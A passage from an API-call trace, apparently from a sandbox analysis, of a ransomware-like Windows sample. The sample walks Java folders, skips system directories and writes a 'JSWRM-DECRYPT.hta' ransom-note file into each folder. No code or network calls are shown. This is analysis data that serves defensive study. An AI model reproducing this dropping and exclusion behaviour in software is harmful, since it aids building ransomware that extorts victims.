Flags=0x0, Size=0x30) returned 0x1f8328 [0069.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.400] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2005afea, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x2005afea, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2005afea, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0069.400] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0069.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0069.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0069.400] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc218, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0069.400] lstrcmpiW (lpString1="sqmapi.dll", lpString2=".") returned 1 [0069.400] lstrcmpiW (lpString1="sqmapi.dll", lpString2="..") returned 1 [0069.400] lstrcmpiW (lpString1="sqmapi.dll", lpString2="...") returned 1 [0069.400] lstrcmpiW (lpString1="sqmapi.dll", lpString2="windows") returned -1 [0069.400] lstrcmpiW (lpString1="sqmapi.dll", lpString2="recovery") returned 1 [0069.401] lstrcmpiW (lpString1="sqmapi.dll", lpString2="perflogs") returned 1 [0069.401] lstrcmpiW (lpString1="sqmapi.dll", lpString2="documents and settings") returned 1 [0069.401] lstrcmpiW (lpString1="sqmapi.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.401] lstrcmpiW (lpString1="sqmapi.dll", lpString2="system volume information") returned -1 [0069.401] lstrcmpiW (lpString1="sqmapi.dll", lpString2="msocache") returned 1 [0069.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi.dll", cchWideChar=10, lpMultiByteStr=0x345f610, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqmapi.dll", lpUsedDefaultChar=0x0) returned 10 [0069.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi.dll", cchWideChar=10, lpMultiByteStr=0x345f5e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqmapi.dll", lpUsedDefaultChar=0x0) returned 10 [0069.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0069.401] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc218, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0069.401] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0069.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0069.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0069.401] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa235ac5b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0069.401] lstrcmpiW (lpString1="Java", lpString2=".") returned 1 [0069.401] lstrcmpiW (lpString1="Java", lpString2="..") returned 1 [0069.401] lstrcmpiW (lpString1="Java", lpString2="...") returned 1 [0069.401] lstrcmpiW (lpString1="Java", lpString2="windows") returned -1 [0069.401] lstrcmpiW (lpString1="Java", lpString2="recovery") returned -1 [0069.401] lstrcmpiW (lpString1="Java", lpString2="perflogs") returned -1 [0069.401] lstrcmpiW (lpString1="Java", lpString2="documents and settings") returned 1 [0069.401] lstrcmpiW (lpString1="Java", lpString2="$RECYCLE.BIN") returned 1 [0069.401] lstrcmpiW (lpString1="Java", lpString2="system volume information") returned -1 [0069.401] lstrcmpiW (lpString1="Java", lpString2="msocache") returned -1 [0069.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0069.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232b48 [0069.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jswrm-decrypt.hta")) returned 0xffffffff [0069.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0069.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24a1c0 [0069.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24bf90 [0069.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24a1c0 | out: hHeap=0x1e0000) returned 1 [0069.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0069.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232c80 [0069.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0069.402] CreateFileW (lpFileName="C:\\Program Files\\Java\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0069.403] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.403] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0069.404] CloseHandle (hObject=0x450) returned 1 [0069.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf90 | out: hHeap=0x1e0000) returned 1 [0069.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0069.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232b48 [0069.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jswrm-decrypt.hta")) returned 0x20 [0069.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0069.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.404] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x200811e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0069.405] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.405] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x200811e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.405] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.405] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.405] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="jre1.8.0_144", cAlternateFileName="JRE18~1.0_1")) returned 1 [0069.405] lstrcmpiW (lpString1="jre1.8.0_144", lpString2=".") returned 1 [0069.405] lstrcmpiW (lpString1="jre1.8.0_144", lpString2="..") returned 1 [0069.405] lstrcmpiW (lpString1="jre1.8.0_144", lpString2="...") returned 1 [0069.405] lstrcmpiW (lpString1="jre1.8.0_144", lpString2="windows") returned -1 [0069.405] lstrcmpiW (lpString1="jre1.8.0_144", lpString2="recovery") returned -1 [0069.405] lstrcmpiW (lpString1="jre1.8.0_144", lpString2="perflogs") returned -1 [0069.405] lstrcmpiW (lpString1="jre1.8.0_144", lpString2="documents and settings") returned 1 [0069.405] lstrcmpiW (lpString1="jre1.8.0_144", lpString2="$RECYCLE.BIN") returned 1 [0069.405] lstrcmpiW (lpString1="jre1.8.0_144", lpString2="system volume information") returned -1 [0069.405] lstrcmpiW (lpString1="jre1.8.0_144", lpString2="msocache") returned -1 [0069.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0069.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0069.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\jswrm-decrypt.hta")) returned 0xffffffff [0069.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0069.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0069.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0069.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.406] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0069.406] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.406] WriteFile (in: hFile=0x3d4, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0069.407] CloseHandle (hObject=0x3d4) returned 1 [0069.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0069.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0069.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0069.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0069.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0069.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0069.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0069.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\jswrm-decrypt.hta")) returned 0x20 [0069.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0069.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0069.408] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x200811e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x232240 [0069.408] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.408] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x200811e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0069.408] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.408] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.408] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="bin", cAlternateFileName="")) returned 1 [0069.408] lstrcmpiW (lpString1="bin", lpString2=".") returned 1 [0069.408] lstrcmpiW (lpString1="bin", lpString2="..") returned 1 [0069.408] lstrcmpiW (lpString1="bin", lpString2="...") returned 1 [0069.408] lstrcmpiW (lpString1="bin", lpString2="windows") returned -1 [0069.408] lstrcmpiW (lpString1="bin", lpString2="recovery") returned -1 [0069.408] lstrcmpiW (lpString1="bin", lpString2="perflogs") returned -1 [0069.408] lstrcmpiW (lpString1="bin", lpString2="documents and settings") returned -1 [0069.408] lstrcmpiW (lpString1="bin", lpString2="$RECYCLE.BIN") returned 1 [0069.408] lstrcmpiW (lpString1="bin", lpString2="system volume information") returned -1 [0069.408] lstrcmpiW (lpString1="bin", lpString2="msocache") returned -1 [0069.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0069.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0069.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0069.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0069.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0069.408] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jswrm-decrypt.hta")) returned 0xffffffff [0069.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0069.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0069.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0069.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0069.410] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0069.410] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.410] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0069.411] CloseHandle (hObject=0x298) returned 1 [0069.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0069.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0069.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0069.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0069.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0069.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.411] GetFileAttributesW (lpFileName="C:\\Program 